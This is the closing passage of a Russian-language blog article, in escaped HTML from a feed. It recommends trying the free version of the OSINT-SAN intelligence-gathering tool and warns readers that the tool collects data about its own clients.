фронта.&lt;/p&gt;
  &lt;p id=&quot;UmAH&quot;&gt;Рекомендую скачать бесплатную версию OSINT-SAN и самостоятельно потыкаться в нем. Людям со знанием python должно качнуть проф. навыки.&lt;/p&gt;
  &lt;p id=&quot;nEJ3&quot;&gt;Кстати ВАЖНО - OSINT-SAN собирает инфу о своих клиентах. Так что учитывайте это при работе с этим и любыми другими ботами/приложениями/веб-сервисами.&lt;/p&gt;
  &lt;p id=&quot;Mj96&quot;&gt;Благодарю за прочтение статьи.&lt;/p&gt;

</content></entry></feed>